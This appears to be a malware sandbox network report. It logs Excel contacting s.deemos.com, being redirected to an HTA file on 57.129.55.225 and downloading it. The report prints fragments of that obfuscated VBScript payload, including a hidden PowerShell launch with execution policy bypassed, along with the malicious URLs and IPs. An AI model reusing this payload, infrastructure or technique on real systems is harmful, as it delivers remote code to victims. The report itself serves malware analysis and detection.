                                          Dec 20, 2024 15:28:25.766906977 CET49808443192.168.2.2414.103.79.10
                                          Dec 20, 2024 15:28:25.766936064 CET49808443192.168.2.2414.103.79.10
                                          Dec 20, 2024 15:28:25.770071030 CET49808443192.168.2.2414.103.79.10
                                          Dec 20, 2024 15:28:25.770092010 CET4434980814.103.79.10192.168.2.24
                                          Dec 20, 2024 15:28:25.771923065 CET4980980192.168.2.2457.129.55.225
                                          Dec 20, 2024 15:28:25.891379118 CET804980957.129.55.225192.168.2.24
                                          Dec 20, 2024 15:28:25.891503096 CET4980980192.168.2.2457.129.55.225
                                          Dec 20, 2024 15:28:25.891674042 CET4980980192.168.2.2457.129.55.225
                                          Dec 20, 2024 15:28:26.011188030 CET804980957.129.55.225192.168.2.24
                                          Dec 20, 2024 15:28:27.157130957 CET804980957.129.55.225192.168.2.24
                                          Dec 20, 2024 15:28:27.157166004 CET804980957.129.55.225192.168.2.24
                                          Dec 20, 2024 15:28:27.157179117 CET804980957.129.55.225192.168.2.24
                                          Dec 20, 2024 15:28:27.157218933 CET4980980192.168.2.2457.129.55.225
                                          Dec 20, 2024 15:28:27.157218933 CET4980980192.168.2.2457.129.55.225
                                          Dec 20, 2024 15:28:27.157659054 CET804980957.129.55.225192.168.2.24
                                          Dec 20, 2024 15:28:27.157672882 CET804980957.129.55.225192.168.2.24
                                          Dec 20, 2024 15:28:27.157685041 CET804980957.129.55.225192.168.2.24
                                          Dec 20, 2024 15:28:27.157699108 CET804980957.129.55.225192.168.2.24
                                          Dec 20, 2024 15:28:27.157717943 CET4980980192.168.2.2457.129.55.225
                                          Dec 20, 2024 15:28:27.157759905 CET4980980192.168.2.2457.129.55.225
                                          Dec 20, 2024 15:28:27.158493042 CET804980957.129.55.225192.168.2.24
                                          Dec 20, 2024 15:28:27.158508062 CET804980957.129.55.225192.168.2.24
                                          Dec 20, 2024 15:28:27.158520937 CET804980957.129.55.225192.168.2.24
                                          Dec 20, 2024 15:28:27.158546925 CET4980980192.168.2.2457.129.55.225
                                          Dec 20, 2024 15:28:27.158577919 CET4980980192.168.2.2457.129.55.225
                                          Dec 20, 2024 15:28:27.276942015 CET804980957.129.55.225192.168.2.24
                                          Dec 20, 2024 15:28:27.277075052 CET4980980192.168.2.2457.129.55.225
                                          Dec 20, 2024 15:28:27.277080059 CET804980957.129.55.225192.168.2.24
                                          Dec 20, 2024 15:28:27.277138948 CET4980980192.168.2.2457.129.55.225
                                          Dec 20, 2024 15:28:27.327159882 CET4980980192.168.2.2457.129.55.225
                                          Dec 20, 2024 15:28:27.327179909 CET4980980192.168.2.2457.129.55.225
                                          Dec 20, 2024 15:28:27.349126101 CET804980957.129.55.225192.168.2.24
                                          Dec 20, 2024 15:28:27.349179983 CET4980980192.168.2.2457.129.55.225
                                          Dec 20, 2024 15:28:27.349266052 CET804980957.129.55.225192.168.2.24
                                          Dec 20, 2024 15:28:27.349428892 CET4980980192.168.2.2457.129.55.225
                                          Dec 20, 2024 15:28:50.525549889 CET49766443192.168.2.24162.159.61.3
                                          Dec 20, 2024 15:28:50.645095110 CET44349766162.159.61.3192.168.2.24
                                          Dec 20, 2024 15:28:50.744354963 CET49765443192.168.2.24162.159.61.3
                                          Dec 20, 2024 15:28:50.864109993 CET44349765162.159.61.3192.168.2.24
                                          Dec 20, 2024 15:28:52.542779922 CET49766443192.168.2.24162.159.61.3
                                          Dec 20, 2024 15:28:52.543324947 CET49765443192.168.2.24162.159.61.3
                                          Dec 20, 2024 15:28:52.668998957 CET44349766162.159.61.3192.168.2.24
                                          Dec 20, 2024 15:28:52.669054031 CET49766443192.168.2.24162.159.61.3
                                          Dec 20, 2024 15:28:52.669600010 CET44349765162.159.61.3192.168.2.24
                                          Dec 20, 2024 15:28:52.670176983 CET49765443192.168.2.24162.159.61.3
                                          Dec 20, 2024 15:28:59.910361052 CET49823443192.168.2.24162.159.61.3
                                          Dec 20, 2024 15:28:59.910403967 CET44349823162.159.61.3192.168.2.24
                                          Dec 20, 2024 15:28:59.910543919 CET49823443192.168.2.24162.159.61.3
                                          Dec 20, 2024 15:28:59.910823107 CET49824443192.168.2.24162.159.61.3
                                          Dec 20, 2024 15:28:59.910840988 CET44349824162.159.61.3192.168.2.24
                                          Dec 20, 2024 15:28:59.910893917 CET49824443192.168.2.24162.159.61.3
                                          Dec 20, 2024 15:29:00.057145119 CET49823443192.168.2.24162.159.61.3
                                          Dec 20, 2024 15:29:00.057167053 CET44349823162.159.61.3192.168.2.24
                                          Dec 20, 2024 15:29:00.057250023 CET49824443192.168.2.24162.159.61.3
                                          Dec 20, 2024 15:29:00.057267904 CET44349824162.159.61.3192.168.2.24
                                          Dec 20, 2024 15:29:00.869927883 CET49825443192.168.2.24162.159.61.3
                                          Dec 20, 2024 15:29:00.869987965 CET44349825162.159.61.3192.168.2.24
                                          Dec 20, 2024 15:29:00.870138884 CET49825443192.168.2.24162.159.61.3
                                          Dec 20, 2024 15:29:00.870399952 CET49825443192.168.2.24162.159.61.3
                                          Dec 20, 2024 15:29:00.870414972 CET44349825162.159.61.3192.168.2.24
                                          Dec 20, 2024 15:29:01.187098980 CET49826443192.168.2.24162.159.61.3
                                          Dec 20, 2024 15:29:01.187118053 CET44349826162.159.61.3192.168.2.24
                                          Dec 20, 2024 15:29:01.187186003 CET49826443192.168.2.24162.159.61.3
                                          Dec 20, 2024 15:29:01.187378883 CET49826443192.168.2.24162.159.61.3
                                          Dec 20, 2024 15:29:01.187392950 CET44349826162.159.61.3192.168.2.24
                                          Dec 20, 2024 15:29:01.274243116 CET44349823162.159.61.3192.168.2.24
                                          Dec 20, 2024 15:29:01.278743029 CET49823443192.168.2.24162.159.61.3
                                          Dec 20, 2024 15:29:01.278752089 CET44349823162.159.61.3192.168.2.24
                                          Dec 20, 2024 15:29:01.280369043 CET44349823162.159.61.3192.168.2.24
                                          Dec 20, 2024 15:29:01.280481100 CET49823443192.168.2.24162.159.61.3
                                          Dec 20, 2024 15:29:01.283099890 CET44349824162.159.61.3192.168.2.24
                                          Dec 20, 2024 15:29:01.297595024 CET49824443192.168.2.24162.159.61.3
                                          Dec 20, 2024 15:29:01.297602892 CET44349824162.159.61.3192.168.2.24
                                          Dec 20, 2024 15:29:01.302126884 CET44349824162.159.61.3192.168.2.24
                                          Dec 20, 2024 15:29:01.302328110 CET49824443192.168.2.24162.159.61.3
                                          Dec 20, 2024 15:29:01.394340992 CET49823443192.168.2.24162.159.61.3
                                          Dec 20, 2024 15:29:01.394531012 CET44349823162.159.61.3192.168.2.24
                                          Dec 20, 2024 15:29:01.395147085 CET49824443192.168.2.24162.159.61.3
                                          Dec 20, 2024 15:29:01.395445108 CET44349824162.159.61.3192.168.2.24
                                          Dec 20, 2024 15:29:01.400317907 CET49823443192.168.2.24162.159.61.3
                                          Dec 20, 2024 15:29:01.400333881 CET44349823162.159.61.3192.168.2.24
                                          Dec 20, 2024 15:29:01.400636911 CET49824443192.168.2.24162.159.61.3
                                          Dec 20, 2024 15:29:01.400654078 CET44349824162.159.61.3192.168.2.24
                                          Dec 20, 2024 15:29:01.547353029 CET49823443192.168.2.24162.159.61.3
                                          Dec 20, 2024 15:29:01.611325979 CET44349824162.159.61.3192.168.2.24
                                          Dec 20, 2024 15:29:01.611434937 CET49824443192.168.2.24162.159.61.3
                                          Dec 20, 2024 15:29:01.839570999 CET44349824162.159.61.3192.168.2.24
                                          Dec 20, 2024 15:29:01.839673042 CET44349823162.159.61.3192.168.2.24
                                          Dec 20, 2024 15:29:01.839775085 CET44349823162.159.61.3192.168.2.24
                                          Dec 20, 2024 15:29:01.839900017 CET49823443192.168.2.24162.159.61.3
                                          Dec 20, 2024 15:29:01.839946985 CET44349824162.159.61.3192.168.2.24
                                          Dec 20, 2024 15:29:01.840157986 CET49824443192.168.2.24162.159.61.3
                                          Dec 20, 2024 15:29:01.847995043 CET49824443192.168.2.24162.159.61.3
                                          Dec 20, 2024 15:29:01.848005056 CET44349824162.159.61.3192.168.2.24
                                          Dec 20, 2024 15:29:01.856916904 CET49823443192.168.2.24162.159.61.3
                                          Dec 20, 2024 15:29:01.856930017 CET44349823162.159.61.3192.168.2.24
                                          Dec 20, 2024 15:29:02.059046984 CET49825443192.168.2.24162.159.61.3
                                          Dec 20, 2024 15:29:02.070211887 CET49826443192.168.2.24162.159.61.3
                                          Dec 20, 2024 15:29:02.081623077 CET44349825162.159.61.3192.168.2.24
                                          Dec 20, 2024 15:29:02.081754923 CET49825443192.168.2.24162.159.61.3
                                          Dec 20, 2024 15:29:02.111339092 CET44349826162.159.61.3192.168.2.24
                                          Dec 20, 2024 15:29:02.429431915 CET44349826162.159.61.3192.168.2.24
                                          Dec 20, 2024 15:29:02.429538012 CET49826443192.168.2.24162.159.61.3

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Dec 20, 2024 15:27:23.268712997 CET60116443192.168.2.24162.159.61.3
                                          Dec 20, 2024 15:27:23.282162905 CET60116443192.168.2.24162.159.61.3
                                          Dec 20, 2024 15:27:23.282259941 CET60116443192.168.2.24162.159.61.3
                                          Dec 20, 2024 15:27:24.282995939 CET5581653192.168.2.241.1.1.1
                                          Dec 20, 2024 15:27:24.283337116 CET60116443192.168.2.24162.159.61.3
                                          Dec 20, 2024 15:27:24.283337116 CET60116443192.168.2.24162.159.61.3
                                          Dec 20, 2024 15:27:24.383663893 CET44360116162.159.61.3192.168.2.24
                                          Dec 20, 2024 15:27:24.395768881 CET60116443192.168.2.24162.159.61.3
                                          Dec 20, 2024 15:27:24.421287060 CET60116443192.168.2.24162.159.61.3
                                          Dec 20, 2024 15:27:24.597821951 CET44360116162.159.61.3192.168.2.24
                                          Dec 20, 2024 15:27:24.597870111 CET44360116162.159.61.3192.168.2.24
                                          Dec 20, 2024 15:27:24.597898960 CET44360116162.159.61.3192.168.2.24
                                          Dec 20, 2024 15:27:24.597928047 CET44360116162.159.61.3192.168.2.24
                                          Dec 20, 2024 15:27:24.598647118 CET60116443192.168.2.24162.159.61.3
                                          Dec 20, 2024 15:27:24.598647118 CET60116443192.168.2.24162.159.61.3
                                          Dec 20, 2024 15:27:24.598647118 CET60116443192.168.2.24162.159.61.3
                                          Dec 20, 2024 15:27:24.696161985 CET60116443192.168.2.24162.159.61.3
                                          Dec 20, 2024 15:27:24.710165977 CET44360116162.159.61.3192.168.2.24
                                          Dec 20, 2024 15:27:24.747159004 CET60116443192.168.2.24162.159.61.3
                                          Dec 20, 2024 15:27:24.913305044 CET44360116162.159.61.3192.168.2.24
                                          Dec 20, 2024 15:27:24.913358927 CET44360116162.159.61.3192.168.2.24
                                          Dec 20, 2024 15:27:24.942488909 CET60116443192.168.2.24162.159.61.3
                                          Dec 20, 2024 15:27:25.014799118 CET44360116162.159.61.3192.168.2.24
                                          Dec 20, 2024 15:27:29.495649099 CET6182453192.168.2.241.1.1.1
                                          Dec 20, 2024 15:28:06.231888056 CET56412443192.168.2.24162.159.61.3
                                          Dec 20, 2024 15:28:06.232208967 CET56412443192.168.2.24162.159.61.3
                                          Dec 20, 2024 15:28:06.233220100 CET56412443192.168.2.24162.159.61.3
                                          Dec 20, 2024 15:28:06.233372927 CET56412443192.168.2.24162.159.61.3
                                          Dec 20, 2024 15:28:07.244179964 CET56412443192.168.2.24162.159.61.3
                                          Dec 20, 2024 15:28:07.244343042 CET56412443192.168.2.24162.159.61.3
                                          Dec 20, 2024 15:28:07.244492054 CET56412443192.168.2.24162.159.61.3
                                          Dec 20, 2024 15:28:07.244527102 CET56412443192.168.2.24162.159.61.3
                                          Dec 20, 2024 15:28:07.317054033 CET44356412162.159.61.3192.168.2.24
                                          Dec 20, 2024 15:28:07.317594051 CET56412443192.168.2.24162.159.61.3
                                          Dec 20, 2024 15:28:07.353329897 CET56412443192.168.2.24162.159.61.3
                                          Dec 20, 2024 15:28:07.558919907 CET44356412162.159.61.3192.168.2.24
                                          Dec 20, 2024 15:28:07.558968067 CET44356412162.159.61.3192.168.2.24
                                          Dec 20, 2024 15:28:07.559303999 CET56412443192.168.2.24162.159.61.3
                                          Dec 20, 2024 15:28:07.559541941 CET44356412162.159.61.3192.168.2.24
                                          Dec 20, 2024 15:28:07.559573889 CET44356412162.159.61.3192.168.2.24
                                          Dec 20, 2024 15:28:07.559787989 CET56412443192.168.2.24162.159.61.3
                                          Dec 20, 2024 15:28:07.559818029 CET56412443192.168.2.24162.159.61.3
                                          Dec 20, 2024 15:28:07.572210073 CET56412443192.168.2.24162.159.61.3
                                          Dec 20, 2024 15:28:07.636904001 CET44356412162.159.61.3192.168.2.24
                                          Dec 20, 2024 15:28:07.665906906 CET56412443192.168.2.24162.159.61.3
                                          Dec 20, 2024 15:28:07.874217987 CET44356412162.159.61.3192.168.2.24
                                          Dec 20, 2024 15:28:07.874249935 CET44356412162.159.61.3192.168.2.24
                                          Dec 20, 2024 15:28:07.885973930 CET44356412162.159.61.3192.168.2.24
                                          Dec 20, 2024 15:28:07.900222063 CET56412443192.168.2.24162.159.61.3
                                          Dec 20, 2024 15:28:22.707626104 CET6523853192.168.2.241.1.1.1
                                          Dec 20, 2024 15:28:23.127971888 CET53652381.1.1.1192.168.2.24
                                          Dec 20, 2024 15:28:59.755378962 CET6523853192.168.2.241.1.1.1
                                          Dec 20, 2024 15:28:59.892395973 CET53652381.1.1.1192.168.2.24

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Dec 20, 2024 15:27:24.282995939 CET192.168.2.241.1.1.10x16beStandard query (0)cxcs.microsoft.netA (IP address)IN (0x0001)false
                                          Dec 20, 2024 15:27:29.495649099 CET192.168.2.241.1.1.10x5748Standard query (0)tse1.mm.bing.netA (IP address)IN (0x0001)false
                                          Dec 20, 2024 15:28:22.707626104 CET192.168.2.241.1.1.10xf7f2Standard query (0)s.deemos.comA (IP address)IN (0x0001)false
                                          Dec 20, 2024 15:28:59.755378962 CET192.168.2.241.1.1.10xfbd2Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Dec 20, 2024 15:27:24.513915062 CET1.1.1.1192.168.2.240x16beNo error (0)cxcs.microsoft.netcxcs.microsoft.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                          Dec 20, 2024 15:27:29.803402901 CET1.1.1.1192.168.2.240x5748No error (0)tse1.mm.bing.netmm-mm.bing.net.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                          Dec 20, 2024 15:27:29.803402901 CET1.1.1.1192.168.2.240x5748No error (0)ax-0001.ax-msedge.net150.171.27.10A (IP address)IN (0x0001)false
                                          Dec 20, 2024 15:27:29.803402901 CET1.1.1.1192.168.2.240x5748No error (0)ax-0001.ax-msedge.net150.171.28.10A (IP address)IN (0x0001)false
                                          Dec 20, 2024 15:27:36.527059078 CET1.1.1.1192.168.2.240x300bNo error (0)scdn1cc4b.wpc.9aea3.sigmacdn.netsni1gl.wpc.sigmacdn.netCNAME (Canonical name)IN (0x0001)false
                                          Dec 20, 2024 15:27:36.527059078 CET1.1.1.1192.168.2.240x300bNo error (0)sni1gl.wpc.sigmacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                          Dec 20, 2024 15:28:23.127971888 CET1.1.1.1192.168.2.240xf7f2No error (0)s.deemos.com14.103.79.10A (IP address)IN (0x0001)false
                                          Dec 20, 2024 15:28:59.892395973 CET1.1.1.1192.168.2.240xfbd2No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                          Dec 20, 2024 15:28:59.892395973 CET1.1.1.1192.168.2.240xfbd2No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false

                                          HTTP Request Dependency Graph

                                          • s.deemos.com
                                          • chrome.cloudflare-dns.com
                                          • 57.129.55.225

                                          HTTP Packets

                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.244980957.129.55.225803488C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                          TimestampBytes transferredDirectionData
                                          Dec 20, 2024 15:28:25.891674042 CET278OUTGET /225/enn/mniscreenthinkinggoodforentiretimegoodfotbusubessthings.hta HTTP/1.1
                                          Accept: */*
                                          UA-CPU: AMD64
                                          Accept-Encoding: gzip, deflate
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Connection: Keep-Alive
                                          Host: 57.129.55.225
                                          Dec 20, 2024 15:28:27.157130957 CET1236INHTTP/1.1 200 OK
                                          Date: Fri, 20 Dec 2024 14:28:26 GMT
                                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                          Last-Modified: Fri, 20 Dec 2024 11:02:40 GMT
                                          ETag: "3de8-629b195d93fcb"
                                          Accept-Ranges: bytes
                                          Content-Length: 15848
                                          Keep-Alive: timeout=5, max=100
                                          Connection: Keep-Alive
                                          Content-Type: application/hta
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 6d 75 6c 61 74 65 49 45 38 22 20 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 53 43 52 49 70 54 20 74 79 50 65 3d 22 74 45 58 54 2f 56 62 53 63 72 49 70 74 22 3e 0d 0a 44 49 6d 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 [TRUNCATED]
                                          Data Ascii: <!DOCTYPE html><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" ><html><body><SCRIpT tyPe="tEXT/VbScrIpt">DImTUzkrgqBknbtbVQXNIcXRvgdMbxOKmWpBOuVZPzxfxOfXSarEhOplYnjMcthreajAWMAlWBavFUYJDgljBcoVTGVgjlVafReLGKBypgjeaBBHRRHyfZxqVSpPJjGgddadhwAgJUbZXRonwNFshOsRSEt,
                                          Dec 20, 2024 15:28:27.157166004 CET1236INData Raw: 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 58 63 47 4b 49 64 70 4f 41 4c 5a 4e 79 72 57 56 74 4c 4a 70 46 67 42 52 58 73 65 43 59 6d 64
                                          Data Ascii: XcGKIdpOALZNyrWVtLJpFgBRXseCYmddnfvurREaxWhYTWFErYzdIQJGSTXKhHTyEtPGIVnsnQBLWTwanFxGFkbddKhjIriIRiUVccXTRIpBbYelcTMAOcmjzgPzVcEJUNTOUcrFfLGYCZloFeyoHhYa
                                          Dec 20, 2024 15:28:27.157179117 CET1236INData Raw: 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3d 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
                                          Data Ascii: =
                                          Dec 20, 2024 15:28:27.157659054 CET1236INData Raw: 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
                                          Data Ascii: )
                                          Dec 20, 2024 15:28:27.157672882 CET1236INData Raw: 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 22 50 6f 57 45 72 73 68 45 4c 6c 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                          Data Ascii: "PoWErshELl -Ex byPaSs -Nop -w
                                          Dec 20, 2024 15:28:27.157685041 CET1236INData Raw: 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 6f 52 6d 4a 44 5a 43 6b 37 4a 79 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41
                                          Data Ascii: iAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBoRmJDZCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVFZBaVRZeHAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1lc3BBY0UgICAgICAgICAgICAg
                                          Dec 20, 2024 15:28:27.157699108 CET1236INData Raw: 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
                                          Data Ascii: TUzkrgqBknbtbVQXNIcXRvgdMbxOKmWpBOuVZPzxfxOfXSarEhOplYnjMcthreajAWMAlWBavFUYJDgljBcoVTGVgjlVafReLGKBypgjeaBBHRRHyfZxqVSpPJjGgddadhwAgJUbZXRonwNFshOsRSEt
                                          Dec 20, 2024 15:28:27.158493042 CET1236INData Raw: 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
                                          Data Ascii: &
                                          Dec 20, 2024 15:28:27.158508062 CET1236INData Raw: 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
                                          Data Ascii: &
                                          Dec 20, 2024 15:28:27.158520937 CET1236INData Raw: 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 26 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
                                          Data Ascii: &
                                          Dec 20, 2024 15:28:27.276942015 CET1236INData Raw: 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
                                          Data Ascii: ChrW(&H2F) & Chr(&H43) & ChrW(&H20)


                                          HTTPS Proxied Packets

                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.244980814.103.79.104433488C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                          TimestampBytes transferredDirectionData
                                          2024-12-20 14:28:25 UTC244OUTGET /lqSa1Aoh?&linen=frightened&trumpet HTTP/1.1
                                          Accept: */*
                                          UA-CPU: AMD64
                                          Accept-Encoding: gzip, deflate
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: s.deemos.com
                                          Connection: Keep-Alive
                                          2024-12-20 14:28:25 UTC470INHTTP/1.1 302 Found
                                          Date: Fri, 20 Dec 2024 14:28:25 GMT
                                          Content-Type: text/plain; charset=utf-8
                                          Content-Length: 110
                                          Connection: close
                                          X-DNS-Prefetch-Control: off
                                          X-Frame-Options: SAMEORIGIN
                                          Strict-Transport-Security: max-age=15724800; includeSubDomains
                                          X-Download-Options: noopen
                                          X-Content-Type-Options: nosniff
                                          X-XSS-Protection: 1; mode=block
                                          Location: http://57.129.55.225/225/enn/mniscreenthinkinggoodforentiretimegoodfotbusubessthings.hta
                                          Vary: Accept
                                          2024-12-20 14:28:25 UTC110INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 35 37 2e 31 32 39 2e 35 35 2e 32 32 35 2f 32 32 35 2f 65 6e 6e 2f 6d 6e 69 73 63 72 65 65 6e 74 68 69 6e 6b 69 6e 67 67 6f 6f 64 66 6f 72 65 6e 74 69 72 65 74 69 6d 65 67 6f 6f 64 66 6f 74 62 75 73 75 62 65 73 73 74 68 69 6e 67 73 2e 68 74 61
                                          Data Ascii: Found. Redirecting to http://57.129.55.225/225/enn/mniscreenthinkinggoodforentiretimegoodfotbusubessthings.hta


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          1192.168.2.2449823162.159.61.34438244C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-20 14:29:01 UTC245OUTPOST /dns-query HTTP/1.1
                                          Host: chrome.cloudflare-dns.com
                                          Connection: keep-alive
                                          Content-Length: 128
                                          Accept: application/dns-message
                                          Accept-Language: *
                                          User-Agent: Chrome
                                          Accept-Encoding: identity
                                          Content-Type: application/dns-message
                                          2024-12-20 14:29:01 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                          Data Ascii: wwwgstaticcom)TP
                                          2024-12-20 14:29:01 UTC247INHTTP/1.1 200 OK
                                          Server: cloudflare
                                          Date: Fri, 20 Dec 2024 14:29:01 GMT
                                          Content-Type: application/dns-message
                                          Connection: close
                                          Access-Control-Allow-Origin: *
                                          Content-Length: 468
                                          CF-RAY: 8f50527cbca5c33a-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          2024-12-20 14:29:01 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 d6 00 04 8e fb 29 03 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                          Data Ascii: wwwgstaticcom))


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          2192.168.2.2449824162.159.61.34438244C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-20 14:29:01 UTC245OUTPOST /dns-query HTTP/1.1
                                          Host: chrome.cloudflare-dns.com
                                          Connection: keep-alive
                                          Content-Length: 128
                                          Accept: application/dns-message
                                          Accept-Language: *
                                          User-Agent: Chrome
                                          Accept-Encoding: identity
                                          Content-Type: application/dns-message
